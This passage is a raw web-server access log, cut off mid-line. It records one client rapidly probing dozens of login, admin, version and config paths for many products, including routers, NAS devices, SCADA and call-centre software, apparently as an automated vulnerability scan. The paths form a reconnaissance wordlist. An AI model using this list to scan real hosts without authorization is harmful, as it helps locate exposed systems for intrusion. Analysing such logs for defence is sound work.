92-249-249-197.pool.digikabel.hu "/tos/index.php?user/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rs/application-about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/Main_Login.asp" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.234.162.31] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/admin/reports/updates" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/luci" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/json/login_session" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/images/logo.gif" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nidp/app/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/build.gradle" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/pom.xml" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/main/main.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/javascript/validation/OEM.js" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/status" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/dniapi/userInfos" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 200 - GET http 92-249-249-197.pool.digikabel.hu "/index.html" [Client 172.234.162.31] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/admin/reports/status" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/workplace/home.action" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ui/login.action" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/metrics" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/pandora_console/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/assets/img/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v2/hoverfly/version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/centreon/api/latest/platform/versions" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:02 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/core/auth/login/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/authLogin.cgi" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/webportal.cgi" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin/config.php" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/status" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/css/elfinder.min.css" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/am_bin/amlogin" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/web/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/config_dump" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/mailinspector/login.php" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/agc/vicidial.php" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/system/version/current" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/info" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/css/eonweb.css" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/agent/vicidial.php" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/hx/api/about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/index.do" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:03 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/themes/admin/default/build/assets/favicon-19fbef86.svg" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/AppsHome.do" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/app/ui/login.jsp" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/system/gwinfo" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/decisioncenter-api/v1/about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/plugin/webs_model_cfg.js" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/openapi.json" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/login/?next=/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/json/login_session" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/Main_Login.asp" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/luci" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/photo/webapi/query.php?api=SYNO.API.Info&method=query&version=1" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nifi-api/flow/about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/jtcgi/wte.pyc" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/index.lua" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/rs/application-about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/MagicInfo/config.js" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nifi/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/info.htm" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api-description" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/~login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/meteobridge.cgi" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/dashboard/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/metrics" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/i18n/component/JS" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v3/meta" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/v2" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:04 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/nidp/app/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/plugins/post-smtp/readme.txt" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/monitor/index.php/auth/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v2/hoverfly/version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/build.gradle" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/management/v1/cluster/state" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/ui/login.action" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:05 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ignite?cmd=version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/index.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/kubepi/fav.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/browser/index.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/status" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/info" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v2.0/systeminfo" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/cluster/summary" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/sys/en/neoclassic/login/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/getagent.cgi?type=s" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/agc/vicidial.php" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:06 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/core/auth/login/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nmc/rss/server" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/~login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/sap/bc/ui2/flp" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/download/python/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/system/status" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/webpages/login.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/agent/vicidial.php" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/public/static/favicon.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/AppsHome.do" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/index.do" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/system/gwinfo" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/openapi.json" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/sms_mp/.sms_aut?mplist" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rest/settings" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/config_dump" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/decisioncenter-api/v1/about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/angular.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/admin/config.php" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/index.lua" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v3/meta" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/jtcgi/wte.pyc" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ScadaBR/login.htm" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; 